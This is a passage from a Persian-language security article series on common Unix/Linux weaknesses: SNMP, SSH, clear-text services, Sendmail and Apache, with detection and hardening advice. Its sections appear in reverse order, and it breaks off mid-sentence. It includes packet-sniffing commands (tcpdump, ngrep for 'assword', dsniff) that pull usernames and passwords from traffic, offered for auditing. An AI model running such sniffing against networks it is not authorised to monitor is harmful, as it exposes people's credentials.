نقاط آسيب پذير مرتبط با روش های استفاده شده در SNMP ( نسخه يک )  بهمراه جزئيات مربوطه را می توان در آدرس  CERT - 2002 - 03 ، مشاهده نمود . نقاط آسيب پذير متعددی در SNMP متاثر از روش برخورد با پيام ها توسط ايستگاه های مديريتی است . نقاط آسيب پذير فوق، به نسخه ای خاص  از SNMP محدود نبوده و محصولات متعدد ارائه شده توسط توليد کنندگان را نيز شامل می گردد . مهاجمان با استفاده از نقاط آسيب پذير فوق ، قادر به انجام حملات متفاوت از نوع DoS ( از کار افتادن يک سرويس ) تا پيکربندی و مديريت ناخواسته ماشين آلات و تجهيزات مبتنی بر SNMP  ، می باشند .
برخی از نقاط آسيب پذير در ارتباط با SNMP متاثر از روش های استفاده شده بمنظور تائيد و معتبر سازی پيام ها در نسخه های قديمی SNMP  است ( توارث مشکلات ) . نسخه های يک و دو SNMP ، از يک " رشته  مشترک " غيررمز شده بعنوان  تنها  گزينه موجود  برای تائيد پيام ها استفاده می نمايند . عدم استفاده از روش های مناسب رمزنگاری ، می تواند عاملی مهم در پيدايش نقاط آسيب پذير باشد. نگرش پيش فرض  نسبت به  " رشته مشترک  " که  توسط تعداد زيادی از دستگاههای SNMP استفاده می گردد ، از ذيگر عوامل مهم در ارتباط با عرضه نقاط آسيب پذير است( برخی از توليد کنندگان بمنظور افزايش سطح ايمنی مربوط به داده های حساس ، رشته را بصورت "اختصاصی " تغيير و استفاده می نمايند ) .  شنود اطلاعاتی و ترافيک SNMP ، می تواند افشاء  اطلاعات و ساختار شبکه ( سيستم ها و دستگاههای متصل شده به آن  )  را بدنبال داشته باشد . مهاجمين با استفاده از اطلاعات فوق ، قادر به انتخاب مناسب و دقيق هدف خود بمنظور برنامه ريزی حملات خود می باشند .
اکثر توليد کنندگان بصورت پيش فرض نسخه يک SNMP را فعال و تعدادی  ديگر،  محصولاتی را ارائه می نمايند که  قادر به استفاده ازمدل های امنيتی نسخه شماره سه SNMP  نمی باشند. ( با استفاده از مدل های امنيـی ارائه شده در نسخه شماره سه SNMP ، می توان پيکربندی لازم در خصوص روش های تائيد را بهبود بخشيد ) .
SNMP ، مختص يونيکس نمی باشد و  در ابعاد وسيعی در ويندوز ، در تجهيزات شبکه ای ، در چاپگرها ، access point ها و Bridges ، استفاده می گردد. با توجه به  نتايج حاصل از آناليز حملات مبتنی بر SNMP  ، مشخص شده است که اکثر حملات در اين رابطه بدليل ضعف در پيکربندی SNMP در سيستم های يونيکس است .

سيستم های عامل در معرض تهديد
تقريبا"  بر روی تمامی سيستم های يونيکس و لينوکس  يک نسخه SNMP نصب و بهمراه آن عرضه می گردند. در اغلب موارد پروتکل فوق ، بصورت پيش فرض فعال می باشد. اکثر دستگاه ها و سيستم های عامل شبکه ای مبتنی بر SNMP دارای نقطه آسيب پذير فوق بوده و در معرض تهديد قرار خواهند داشت .

نحوه تشخيص آسيب پذيری سيستم
بمنظور بررسی نصب SNMP  بر روی دستگاههای موجود و متصل شده در شبکه ، می توان از يک برنامه کمکی و يا روش دستی استفاده نمود. برنامه پويشگر SNScan ، نمونه ای در اين زمينه بوده که می توان آن را از طريق آدرس  http://www.foundstone.com/knowledge/free_tools.html دريافت نمود. در موارديکه امکان استفاده از ابزارهای  پويشگر وجود ندارد ، می توان بررسی لازم در خصوص نصب و اجراء SNMP  را بصورت دستی انجام داد. در اين راستا می توان به مستندات سيستم عامل مربوطه مراجعه تا پس از آگاهی از نحوه پياده سازی SNMP  ، عمليات لازم بمنظور تشخيص فعال بودن SNMP را انجام داد . در اين رابطه می توان ، جستجوی لازم در ليست پردازه ها برای يافتن "snmp" در حال اجراء بر روی پورت های 161 و 162 را انجام داد .  وجود صرفا " يک نمونه SNMP  ، دليلی بر آسيب پذيری سيستم است . بمنظور آگاهی از جزيئات لازم در اينخصوص می توان از آدرس  CERT - 2002 - 03 استفاده نمود . در صورت تحقق يکی از شرايط زير و نصب  SNMP ،  سيستم در معرض آسيب  و تهديد قرار خواهد داشت :

• وجود اسامی SNMP Community پيش فرض و يا خالی ( اسامی استفاده شده بعنوان رمزهای عبور )
• وجود اسامی SNMP Community  قابل حدس
• وجود رشته های مخفی SNMP Community

نحوه حفاظت در مقابل نقطه آسيب پذير 
بمنظور حفاظت در مقابل نقطه آسيب پذير فوق ،در دو زمينه می توان اقدامات حفاظتی را سازماندهی نمود .
حفاظت در مقابل  درخواست های آسيب رسان  و تهديد کننده :

• غير فعال نمودن SNMP در صورت عدم ضرورت استفاده از آن
• استفاده از يک مدل امنيتی مبتنی بر کاربر SNMPv3 ،  بمنظور تائيد پيام ها و رمزنگاری داده ها ( در صورت امکان )
• در صورت استفاده از SNMP نسخه يک و يا دو ، می بايست آخرين نسخه Patch ارائه شده توسط توليد کننده ، نصب گردد برای آگاهی از مشخصات توليدکننگان، می توان به  بخش ضميمه CERT Advisory CA-2002-03 ، مراجعه نمود .
• SNMP را در گلوگاه های ورودی شبکه فيلتر نمائيد ( پورت 161 مربوط به TCP/UDP و پورت 162 مربوطه به TCP/UDP )  . عمليات فوق را در موارديکه ضرورتی به مديريت دستگاهها بصورت خارجی وجود ندارد ، می بايست انجام داد .
• از  کنترل دستيابی مبتنی بر ميزبان بر روی سيستم های SNMP agent استفاده گردد . ويژگی فوق ممکن است توسط SNMP agent سيستم های عامل دارای محدوديت هائی باشد ، ولی می توان کنترل لازم در خصوص پذيرش درخواست ها توسط agent مربوطه را انجام داد. در اکثر سيستم های يونيکس ، می توان عمليات فوق را توسط  يک TCP-Wrapper و يا پيکربندی Xined انجام داد . استفاده از يک فايروال فيلترينگ بسته های اطلاعاتی مبتنی بر agent  بر روی يک ميزبان  نيز می تواند در بلاک نمودن درخواست های ناخواسته SNMP موثر واقع شود .

حفاظت در مقابل رشته های قابل حدس

• غير فعال نمودن SNMP در صورت عدم ضرورت استفاده از آن
• استفاده از يک مدل امنيتی مبتنی بر کاربر SNMPv3 ،  بمنظور تائيد پيام ها و رمزنگاری داده ها ( در صورت امکان )
• در صورت استفاده از SNMP نسخه يک و يا دو ، می بايست از يک سياست خاص بمنظور اسامی community ( استفاده شده بعنوان رمزهای عبور ) استفاده گردد. در اين راستا لازم است اسامی بگونه ای انتخاب گردند که  غير قابل حدس بوده و بصورت ادواری و در محدوده های خاص زمانی نيز تغيير داده شوند .
• با استفاده از امکانات موجود می بايست بررسی لازم در خصوص  استحکام اسامی در نظر گرفته شده برای رمزهای عبور راانجام داد.در اين رابطه می توان از خودآموز و ابزار ارائه شده در آدرس  http://www.sans.org/resources/idfaq/snmp.php ، استفاده کرد.
• SNMP را در گلوگاه های ورودی شبکه فيلتر نمائيد ( پورت 161 مربوط به TCP/UDP و پورت 162 مربوطه به TCP/UDP )  . عمليات فوق را در موارديکه ضرورتی به مديريت دستگاهها بصورت خارجی وجود ندارد ، می بايست انجام داد . پيکربندی فيلترينگ را صرفا" بمنظور ترافيک مجاز SNMP بين subnet های مميزی شده ، انجام دهيد.

هشتمين نقطه آسيب پذير : :( Secure Shell (SSH
SSH ، يک سرويس عمومی برای ايمن سازی Login ، اجرای دستورات و ارسال فايل در يک شبکه است .اکثر سيستم های مبتنی بر يونيکس از بسته نرم افزاری OpenSSH ( نسخه فوق بصورت open-source  است ) و يا نسخه تجاری  SSH Communication Security ، استفاده می نمايند . با اينکه SSH دارای ايمنی مناسبتری نسبت به telnet,ftp و برنامه های R-Command  می باشد ، ولی همچنان  در هر دو نسخه اشاره شده ، ضعف های امنيتی متعددی وجود دارد . اکثر ضعف های موجود صرفا" اشکالات جزئی بوده و تعداد اندکی از آنان ، حائز اهميت بوده و می بايست بلافاصله نسبت به برطرف نموودن آنان اقدام گردد . مهمترين تهديد مرتبط با ضعف های امنيتی SSH ، امکان دستيابی (سطح ريشه)  به ماشين آسيب پذير توسط مهاجمان است . با توجه به  رشد چشمگير استفاده از سرويس گيرندگان و سرويس دهندگان  SSH  در محيط های ويندوز،  اکثر اطلاعات ارائه شده در رابطه با نقطه آسيب پذير فوق ، به نسخه های پياده سازی شده  SSH در  ويندوز و nix *  ( يونيکس ، لينوکس  )  بر می گردد .عدم مديريت مناسب SSH ، خصوصا" در ارتباط با پيکربندی و بکارگيری patch ها و بهنگام سازی لازم ، می تواند مسائل و مشکلات خاص خود را  بدنبال داشته باشد .
SSH2 ، ابزاری قدرتمند
تعداد زيادی از نقاط آسيیب پذير تشخيص داده شده   در پروتکل هائی نظير POP3 ( جايگزين با SSH2 SFTP ) ، برنامه Telnet ، سرويس HTTP ,  و ابزارهای مبتنی بر rhost ( نظير : روش های تائيد ,rsh ,   rlogin ,rcp ) باعث ارسال اطلاعات بصورت clear text  و يا عدم پردازش مناسب session های سرويس گيرنده - سرويس دهنده می گردد. پروتکل SSH1 ، دارای  پتانسيل آسيب پذيری  بالائی خصوصا" در ارتباط با session  موقتی رمزنشده می باشد . بدين دليل  مديران سيستم و شبکه ، استفاده از پروتکل SSH2  را  گزينه ای شايسته در اينخصوص می دانند( در موارديکه امکان آن وجود دارد) . لازم است به اين نکته مهم  اشاره گردد که SSH1 و SSH2 با يکديگر سازگار نبوده  و لازم است  نسخه SSH بر روی سرويس گيرنده و سرويس دهنده يکسان باشند (در اين رابطه موارد استثنا ء نيز وجود دارد ) .
کاربران OpenSSH می بايست به اين نکته توجه نمايند که کتابخانه های OpenSSH در مقابل پتانسيل های ايجاد شده توسط OpenSSH ، دارای نرم افزارهای آسيب پذير مختص خود می باشند. بمنظور آگاهی از جزئيات مربوطه ، می توان از آدرس  CERT Advisory 2002-23 استفاده  نمود .در سال 2002 يک نسخه آلوده از OpenSSH  ( نسخه فوق دارای يک trojan-horse  بود ) در زمان کوتاهی گسترش و باعث آسيب های فراوانی گرديد. بمنظور کسب اطلاعات بيشتر در اين رابطه و اطمينان از عدم آسيب پذيری سيستم خود در مقابل نسخه آلوده فوق ، می توان از آدرس  http://www.openssh.org/txt/trojan.adv استفاده نمود .

سيستم های عامل در معرض تهديد
هر نسخه يونيکس و يا لينوکس که بر روی آن OpenSSH 3.3 و يا بعد از آن ( نسخه  ارائه شده در سال 2003 ،version 3.6.1)  و يا SSH Communication Security's SSH 3.0.0  و يا بعد از آن ( نسخه ارائه شده در سال 2003 شماره version 3.5.2 ) نصب واجراء می گردد ،  در معرض اين آسيب قرار خواهد داشت .

نحوه تشخيص آسيب پذيری سيستم
با استفاده از يک پويشگر مناسب ، می توان بررسی لازم در خصوص آسيب پذيری يک نسخه را انجام داد . در اين رابطه می توان با اجرای دستور " ssh   -V " ، از شماره نسخه نصب شده بر روی سيستم آگاه گرديد.  ScanSSH ، ابزاری مفيد  بمنظور تشخيص  از راه دور سرويس دهندگان SSH  آسيب پذير بدليل عدم Patching ، می باشد. دستور خطی ScanSSH ، ليستی از آدرس های شبکه را برای سرويس دهندگان  پويش و گزارشی در ارتباط با شماره نسخه های آنان را ارائه می نمايد . آخرين نسخهScanSSH  که در سال 2001 ارائه شده است را می توان از آدرس http://www.monkey.org/~provos/scanssh دريافت نمود .

نحوه حفاظت در مقابل نقطه آسيب پذير 
بمنظور حفاظت در مقابل نقطه آسيب پذير فوق ، موارد زير پيشنهاد می گردد :

• نسخه  SSH و يا  OpenSSH را به آخرين نسخه موجود ارتقاء دهيد . درصورتيکه SSH و يا OpenSSH بهمراه سيستم عامل ، نصب شده باشد ، می بايست  آخرين Patchمربوطه را از سايت ارائه دهنده سيستم عامل دريافت و آن را برروی سيستم نصب نمود. در صورت استفاده  از OpenSSL  ، از نصب آخرين نسخه آن مطمئن شويد .
• حتی المقدور سعی گردد، نسخه SSH1 به SSH2 ارتقاء يابد .در رابطه با توسعه SSH1  در آينده تصميم خاصی وجود نداشته و توسعه SSH2 مورد نظر می باشد .
• دو نسخه پياده سازی شده SSH ، دارای مجموعه ای از گزينه های انتخابی بوده  که مديران سيستم با استفاده از آنان و با توجه به سياست های موجود می توانند پيکربندی مناسبی در اينخصوص را انجام دهند.  امکان محدوديت در دستيابی به ماشين مورد نظر و اتصال به آن ، روش های تائيد کاربران و ماهيت کاربران مجاز ، نمونه هائی از گزينه های انتخابی بوده که می توان از آنان بمنظور پيکربندی مطلوب استفاده گردد.
• پيکربندی مناسب  سرويس گيرندگان SSH  در زمان اتصال به سرويس دهنده ای که SSH را حمايت نمی نمايد . در چنين مواردی سرويس گيرنده ممکن است به عقب برگشته و استفاده از rsh را در اين رابطه مفيد تشخيص دهد . بمنظور پيشگيری از مواردی اينچنين می بايست  به کليد FallBackToRsh  در فايل پيکربندی SSH ، مقدار NO را نسبت داد .
• از رمزنگاری blowfish در مقابل 3DES استفاده گردد (روش 3DES ، ممکن است بصورت پيش فرض در نسخه مربوطه در نظر گرفته شده باشد ). بدين ترتيب علاوه بر افزايش سرعت در عمليات ، رمزنگاری انجام شده نيز از استحکام مناسبی برخوردار خواهد بود.

در بخش پنجم  اين مقاله به بررسی ساير نقاط آسيب پذير يونيکس و لينوکس خواهيم پرداخت .

آنچه تاکنون گفته شده است :

• بخش اول : بررسی BIND Domain Name System و RPC
• بخش دوم : بررسی Apache Web Server و روش های تائيد کاربران

در بخش سوم اين مقاله به بررسی نقاط آسيب پذير سرويس های Clear Text و Sendmail ، خواهيم پرداخت .

پنجمين نقطه آسيب پذير : :Clear Text Services
تعداد زيادی از سرويس های شبکه استفاده شده توسط سيستم های مبتنی بر يونيکس ، بصورت plain text بوده و از رمزنگاری خاصی استفاده نمی نمايند. ضعف در رمزنگاری ، امکان شنود اطلاعاتی ( مشاهده ترافيک شبکه ) را فراهم و مهاجمان در ادامه امکان دستيابی به محتویات ارتباط ايجاد شده و يا اطلاعات حساس کاربران نظير داده های مرتبط با رمز عبور را بدست خواهند آورد. مثلا" بمنظور تشخيص اطلاعات مرتبط با FTP و يا telnet ( اطلاعات login ) ، يک مهاجم ، می تواند يک sniffer را در شبکه و در محلی بين مسير ارتباطی، مستقر نمايد (بعنوان سرويس دهنده FTP و يا يا Client LAN ) . تبادل اطلاعات بين دستورات ورودی توسط سرويس گيرندگان و پاسخ های ارائه شده توسط سرويس های موجود بر روی سرويس دهنده ، بصورت plain-text خواهد بود. بدين ترتيب ،امکان رديابی ( رهگيری ) داده و يا کليدهای فشرده شده توسط کاربر بسادگی فراهم می گردد. اغلب مهاجمان در حملات اخير خود از برنامه های مختص شنود اطلاعاتی استفاده و عمدتا" اينگونه برنامه ها را بر روی دستگاهها ی آسيیب پذير نصب می نمايند. در چنين مواردی ، تشخيص نام و رمز عبور کاربر در داده های جمع آوری شده ( شنود اطلاعاتی ) ، بسادگی ميسر خواهد شد.جدول زير، ليست برخی از سرويس های شبکه يونيکس را که اطلاعات را بصورت Clear Text ، مبادله می نمايند ، نشان می دهد :

آيتم ارسالی	Clear Auth	Clear Content	پورت	سرويس
متن ، باينری	Yes	Yes	21 , 20	FTP
متن ، باينری	N/A	Yes	69	TFTP
متن	Yes	Yes	23	telnet
متن ، باينری	N/A	Yes	25	SMTP
متن ، باينری	Yes	Yes	110	POP3
متن ، باينری	Yes	Yes	143	IMAP
متن	Yes	Yes	513	rlogin
متن	Yes	Yes	514	rsh
متن ، باينری	Yes	Yes	80	HTTP

سرويس هائی نظير Telnet و FTP که شامل اطلاعات مربوط به تائيد هويت کاربران می باشند ، اطلاعات مورد نظر را بصورت متن ارسال که بالاترين ريسک را بدنبال خواهد داشت . در چنين مواردی مهاجمان می توانند با استفاده مجدد از داده های حساس کاربران نظير نام و رمز عبور، با خيال راحت ! به سيستم دستيابی نمايند .علاوه براين ، اجرای دستورات بصورت clear text می تواند توسط مهاجمان استفاده تا با استفاده از آنان دستورات دلخواه خود را بدون الزامی برای تائيد ، اجراء نمايند. سرويس های Clear text ، می توانند زمينه تهديدات مختلفی نظير : تسهيل در انجام حملات ، دستيابی از راه دور ، اجرای دستورات بر روی يک سيستم مقصد ، شنود و تشخيص اطلاعات را بدنبال داشته باشد .

سيستم های عامل در معرض تهديد
تمامی نمونه های يونيکس ارائه شده ، از سرويس ها ی Clear text استفاده می نمايند. ( telnet و FTP دو نمونه متدواول در اين زمينه می باشند ) . تمامی نمونه نسخه های ارائه شده يونيکس و لينوکس ( تنها استنثاء در اين رابطه، مربوط به آخرين ويرايش Free/OpenBSD می باشد ) ، بصورت پيش فرض ، برخی از سرويس های فوق را نصب می نمايند .

نحوه تشخيص آسيب پذيری سيستم
موثرترين و مطمئن ترين روش بمنظور تشخيص نقطه آسيب پذير فوق (سرويس های clear text ) ، بکارگيری نرم افزاری مشابه با ابزارهای استفاده شده (sniffer) توسط مهاجمان است. متداولترين برنامه موجود در اين زمينه ، tcpdump می باشد. برای دريافت برنامه "tcpdump " می توان از آدرس http://www.tcpdump.org ، استفاده نمود . نحوه فعال نمودن برنامه فوق،بمنظور تشخيص هر گونه ارتباط clear text ، بصورت زير است :

# tcpdump -X -s 1600

دراين راستا می توان از برنامه های ديگر نظير : "ngrep" نيز استفاده نمود. برنامه فوق،امکان جستجوی الگوئی خاص نظير "sername " و يا " assword " را در شبکه فراهم می نمايد. ( اولين حروف، بمنظور سازگاری با حروف بزرگ احتمالی ، در نظر گرفته نشده است ) . برای دريافت برنامه فوق ، می توان از آدرس http://www.packetfactory.net/projects/ngrep استفاده نمود . نحوه فعال نمودن برنامه فوق ، بصورت زير است :

# ngrep assword

در اين رابطه می توان از ابزارهای متنوع ديگری بمنظور تشخيص داده های حساس کاربران ( نام و رمز عبور ) استفاده نمود . Dsniff ، متداولترين ابزار در اين زمينه است . برنامه فوق ، بررسی لازم در خصوص تمامی زوج نام و رمزعبور بر روی پروتکل های Plain text حجيم، نظير FTP ، Telnet و POP3 را انجام و پس از تشخيص، آنان را نمايش خواهد داد. برای بدست آوردن برنامه فوق می توان از آدرس http://www.monkey.org/~dugsong/dsniff استفاده نمود . نحوه فعال نمودن برنامه فوق ، بصورت زير است :

# /usr/sbin/dsniff

نحوه حفاظت در مقابل نقطه آسيب پذير
استفاده از رمزنگاری End-To-End و يا حداقل رمزنگاری Link-level می تواند در اين زمينه مفيد واقع گردد. برخی پروتکل ها از لحاظ رمزنگاری معادل يکديگر می باشند( نظير : POP3S و HTTPS ) . برای پروتکل هائی که دارای قابليت ها و امکانات , ذاتی رمزنگاری نمی باشند ، می توان آنان را از طريق SSH : Secure Shell ، و يا SSL connection انجام داد( tunneling ) .
OpenSSH يک نمونه پياده سازی شده متداول و انعطاف پذير ازSSH است.( قابل دسترس در آدرس http://www.openssh.org ) . برنامه فوق، در اکثر نسخه های يونيکس اجراء و می توان از آن بمنظور ارتباطات از راه دور ( replaces telnet ,rlogin ,rsh ) و tunneling ( پروتکل هائی نظير POP3,SMTP و X11 ) استفاده گردد .
دستور زير نحوه tunnel نمودن POP3 را بر روی SSH connection نشان می دهد. بر روی سرويس دهنده POP3 ، می بايست سرويس دهنده SSH نيز اجراء گردد. در ابتدا آن را بر روی ماشين سرويس گيرنده اجراء می نمائيم :

# ssh -L 110:pop3.mail.server.com:110 username@pop3.mail.server.com

در ادامه ، برنامه سرويس گيرنده پست الکترونيکی را به localhost اشاره می دهيم ، پورت TCP 110 ( برخلاف روال معمول که بصورت : pop3.mail.server.com ، پورت 110 است ) . بدين ترتيب ، تمامی ارتباطات بين ماشين و سرويس دهنده پست الکترونيکی بصورت رمز شده انجام خواهد شد ( tunneled over SSH ) .
يکی ديگر از راه حل های متداول رمزنگاری مبتنی بر tunneling ، استفاده از stunnel است . روش فوق ، پروتکل SSL را پياده سازی( با استفاده از OpenSSL Toolkit ) و می توان آن را بمنظور tunel نمودن پروتکل های متفاوت plain text بخدمت گرفت . برای دريافت برنامه فوق ، می توان از آدرس http://www.stunnel.org استفاده نمود.

ششمين نقطه آسيب پذير : : Sendmail
Sendmail ، برنامه ای است که از آن بمنظور ارسال ، دريافت و فوروارد نمودن نامه های الکترونيکی در اغلب سيستم های يونيکس و لينوکس استفاده می گردد. Sendmail ، يکی از متداولترین MTA : Mail Transfer Agent در اينترنت بوده که بطور گسترده ای از آن بعنوان "آژانش توزيع نامه های الکترونيکی" بهمراه سرويس دهندگان پست الکترونيکی ، استفاده می گردد . Sendmail ، يکی از اهداف اوليه مهاجمان در ساليان اخير بوده و تاکنون حملات متعددی را در ارتباط با آن شاهد بوده ايم. اکثر حملات انجام شده بدليل قديمی بودن و يا عدم patch مناسب نسخه های نصب شده ، با موفقيت همراه بوده است .در اين رابطه می توان به چندين نمونه از حملات اخير اشاره نمود :

- CERT Advisory CA-2003-12 Buffer Overflow in Sendmail
- CERT Advisory CA-2003-07 Remote Buffer Overflow in Sendmail
- CERT Advisory CA-2003-25 Buffer Overflow in Sendmail

خطرات و تهديدات مرتبط با Sendmail را می توان به دو گروه عمده تقسيم نمود : از دست رفتن امتيازات که علت آن buffer overflow خواهد بود و پيکربندی نادرست سيستم که می تواند تبعات منفی را بدنبال داشته باشد ( مثلا" تبديل يک سيستم به مرکزی آلوده برای توزيع نامه های الکترونيکی ) .عامل اصلی در بروز تهديدات نوع اول ، عمدتا" به استفاده از نسخه های قديمی و يا عدم patching مناسب سيستم برمی گردد.علت اصلی تهديدات نوع دوم ، به استفاده از فايل های پيکربندی پيش فرض و نادرست برمی گردد .

سيستم های عامل در معرض تهديد
تقريبا" تمامی نسخه های لينوکس و يونيکس بهمراه يک نسخه نصب شده از Sendmail عرضه می گردند. سرويس فوق، بصورت پيش فرض فعال می باشد .

نحوه تشخيص آسيب پذيری سيستم
Sendmail ، در گذشته دارای نقاط آسيب پذير فراوانی بوده که بتدريج وبا ارائه نسخه های جديدتر و patch های مربوطه ، ميزان آسيب پذيری آن کاهش يافته است .هر نسخه قديمی و يا Patch نشده نرم فزار فوق در معرض آسيب قرار خواهد داشت . بمنطور مشخص نمودن شماره نسخه برنامه sendmail ، می توان از دستور زير استفاده نمود :

echo \$Z | /usr/lib/sendmail -bt -d0

مسير مشخص شده sendmail در دستور فوق ، با توجه به پيکربندی سيستم ، می تواند متفاوت باشد. برای آگاهی از آخرين نسخه ارائه شده Sendmail می توان از آدرس http://www.sendmail.org/current-release.html استفاده نمود .

نحوه حفاظت در مقابل نقطه آسيب پذير
مراحل زير بمنظور ايمن سازی و حفاظت Sendmail پيشنهاد می گردد :

• نسخه موجود را به آخرين نسخه ارتقاء و از آخرين patch های موجود ، استفاده گردد . برای دريافت source code می توان از آدرس http://www.sendmail.org استفاده نمود. در صورتيکه نسخه sendmail بهمراه سيستم عامل ارائه شده است ( يک Package ) ، می توان برای دريافت patch مربوطه به سايت عرضه کنندگان سيستم عامل مراجعه نمود.
• برنامه sendmail عموما" بصورت پيش فرض در اکثر سيستم های يونيکس و لينوکس ( حتی آنانی که بعنوان سرويس دهنده mail مورد نظر نبوده و فعاليت آنان در ارتباط با mail نخواهد بود) نصب می گردد. برنامه Sendmail را در حالت daemon بر روی ماشين های فوق ، اجراء ننمائيد ( غير فعال نمودن سوئيچ bd - ) . امکان ارسال نامه الکترونيکی توسط سيستم های فوق ، همچنان وجود خواهد داشت . در اين رابطه می بايست پيکربندی سيستم بگونه ای انجام شود که به يک mail relay در فايل پيکربندی sendmail ، اشاره گردد.فايل پيکربندی، sendmail.cf نام داشته و معمولا" در آدرس etc/mail/sendmail.cf قرار دارد .
• در صورتيکه لازم است sendmail در حالت daemon اجراء گردد، می بايست از صحت پيکربندی انجام شده اطمينان حاصل گردد. در اين رابطه می توان از منابع اطلاعاتی زير استفاده نمود :
  http://www.sendmail.org/tips/relaying.html
  http://www.sendmail.org/m4/anti_spam.html
  در نسخه Sendmail 8.9.0 ، امکان open relay بصورت پيش فرض غيرفعال می باشد.تعداد زيادی از عرضه کنندگان سيستم های عامل ، مجددا" آن رادر پيکربندی پيش فرض خود فعال می نمايند. در صورت استفاده از نسخه Sendmail ارائه شده بهمراه سيستم عامل ، می بايست دقت لازم در اينخصوص را انجام داد ( عدم استفاده سرويس دهنده برای realying ).
• در زمان استفاده از نسخه جديد sendmail ( سوئيچ نمودن به يک نسخه ديگر ) ، لازم است تدابير لازم در خصوص تغيير فايل های پيکربندی ارائه شده توسط نسخه قديمی ، انديشيده گردد . برای آگاهی از جزئيات بيشتر در ارتباط با پيکربندی Sendmail ، می توان از آدرس http://www.sendmail.org/m4/readme.html استفاده نمود.
• در موارديکه برنامه Sendmail از منابع موجود بر روی اينترنت Download می گردد ، می بايست بمنظور اطمينان از مجاز بودن نسخه تکثيری از PGP signature استفاده نمود. در اين رابطه لازم است به اين نکته دقت شود که بدون بررسی integrity مربوطه به source code برنامه Sendmail ، نمی بايست از آن استفاده شود. در گذشته ، نسخه هائی از Trojan ها در Sendmail مستقر تا در زمان مناسب حرکت مخرب خود را آغاز نمايند . بمنظور دريافت اطلاعات تکميلی در اين رابطه می توان از آدرس CERT Advisory CA-2002-28استفاده نمود. کليدهای استفاده شده بمنظور sign نمودن برنامه Sendmail دريافتی را می توان از آدرس http://www.sendmail.org/ftp/PGPKEYS بدست آورد . در صورت فقدان PGP ، می بايست از MD5 Checksum بمنظور بررسی integrity کد منبع Sendmail ، استفاده گردد.

برای کسب اطلاعات بيشتر می توان از منابع اطلاعاتی زير استفاده نمود :

http://www.sendmail.org/secure-install.html
http://www.sendmail.org/m4/security_notes.html
http://www.sendmail.org/~gshapiro/security.pdf

در بخش چهارم اين مقاله به بررسی ساير نقاط آسيب پذير يونيکس و لينوکس خواهيم پرداخت .

در بخش اول اين مقاله به بررسی دو مورد از نقاط آسيپ پذير اشاره گرديد. در اين بخش به بررسی نقاط آسيب پذير  Apache Web Server و روش های تائيد کاربران ، خواهيم پرداخت .

سومين نقطه آسيب پذير : Apache Web Server
آپاچی ( Apache) يکی از متداولترين سرويس دهندگان وب بر روی اينترنت است . در مقايسه با سرويس دهنده وب مايکروسافت ( IIS ) ، آپاچی مسائل و مشکلات امنيتی کمتری را داشته  ولی همچنان دارای آسيب پذيری خاص خود است  .
علاوه بر وجود نقاط آسيب پذير در ماژول ها و کد آپاچی ( CA-2002-27 و CA-2002-17 ) ، تکنولوژی های CGI و PHP نيز دارای نقاط آسيب پذيری خاص خود بوده که ضعف های امنيتی آنان به سرويس دهنده وب نيز سرايت می گردد.  در صورت وجود نقاط آسيب پذير در سرويس دهنده آپاچی و يا عناصر مرتبط به آن  ، زمينه تهديدات زير فراهم می گردد :

• غير فعال نمودن سرويس ( DoS )
• نمايش و بمخاطره انداختن  فايل ها و داده های حساس
• دستيابی به سرويس دهنده از راه دور
• بمخاطره افتادن سرويس دهنده ( دستکاری و خرابی سايت )

سيستم های عامل در معرض تهديد
تمامی سيستم های يونيکس قادر به اجراء آپاچی می باشند . آپاچی بصورت پيش فرض بر روی تعداد زيادی از نسخه های  يونيکس و لينوکس ، نصب می گردد .علاوه بر امکان فوق ، آپاچی را می توان  بر روی ميزبانی ديگر که از سيستم عاملی مختلف نظير ويندوز استفاده می نمايد نيز نصب نمود. اين نوع از نسخه های آپاچی نيز می تواند دارای نقاط آسيب پذير خاص خود  باشد .

نحوه تشخيص آسيب پذيری سيستم
بمنظور آگاهی  و کسب اطلاعات  لازم در خصوص نحوه تشخيص آسيب پذيری سرويس دهنده وب آپاچی ، می توان از آدرس های زير استفاده نمود :

• در رابطه با Apache 1.3.x را  می توان از آدرس   http://www.apacheweek.com/features/security-13
• برای Apache 2.0.x می توان از آدرس  http://www.apacheweek.com/features/security-20

آدرس های اشاره شده ، دارای اطلاعات فنی لازم بمنظور نحوه تشخيص آسيب پذيری سيستم و پيشنهادات لازم در خصوص ارتقاء وضعيت امنيتی می باشند . استفاده از آدرس:   http://httpd.apache.org نيز در اين زمينه مفيد است .

نحوه حفاظت در مقابل نقطه آسيب پذير 
بمنظور حفاظت يک سرويس دهنده وب آپاچی ، پيشنهادات زير ارائه می گردد :

• اطمينان از نصب آخرين patch  ارائه شده 
  - در اين رابطه می توان از آدرس http://httpd.apache.org بمنظور آگاهی  از آخرين  وضعيت نسخه ها و Patch levels  استفاده نمود.
  - بمنظور دستيابی به Source code  اکثر نسخه های آپاچی، می توان از آدرس   http://httpd.apache.org/download.cgi استفاده نمود.
  - بمنظور آگاهی و دريافت آخرين Patch های ارائه شده می توان از آدرس  http://www.apache.org/dist/httpd/patches/ استفاده نمود.
• اطمينان از patching عناصر کليدی سيستم عامل که آپاچی بعنوان مرجع از آنان استفاده می نمايد .در اين رابطه لازم است که صرفا" ماژول های ضروری بمنظور صحت عملکرد سرويس دهنده ، در آپاچی کمپايل گردند .لازم است به اين نکته اشاره گردد که  کرم(  mod_ssl ( CA-2002-27 نمونه ای کامل در اين زمينه بوده که از نقاط آسيب پذير در( OpenSSL ( CA-2002-23 استفاده نموده است .
• از اجرای  آپاچی بعنوان ريشه ، اجتناب و می بايست بدين منظور ، کاربر و يا گروهی  خاص با حداقل مجوز ايجاد گردد.  ساير پردازه های سيستم ضرورتی به اجراء تحت کاربر و يا گروه فوق را نخواهند داشت .
• Chroot ، پتانسيلی است  که باعث تعريف مجدد محدوده يک برنامه می گردد . در حقيقت chroot ، باعث تعريف مجدد دايرکتوری ROOT"  و يا "/"  برای يک برنامه و يا يک Login session می گردد .chroot می تواند بعنوان يک لايه تدافعی استفاده گردد . مثلا" در صورتيکه فردی به کامپيوتر شما دستيابی پيدا نمايد ، قادر به مشاهده تمامی فايل های موجود بر روی سيستم نخواهد بود . علاوه بر محدوديت فوق ، محدوديت هائی در خصوص اجرای برخی از دستورات نيز بوجود می آيد.در اين رابطه يک دايرکتوری با نام chroot/ ، ايجاد و تمامی سرويس های مورد نطر با يک انظباط خاص در آن مستقر می گردند . مثلا" سرويس دهنده آپاچی در chroot/httpd / قرار می گيرد. با توجه به موارد فوق ، می بايست آپاچی را در يک  محيط chroot اجراء نمود . درصورتيکه آپاچی بصورت chrooted اجراء و فعاليت خود را  آغاز نمايد ، امکان دستيابی آن به ساير بخش های موجود در  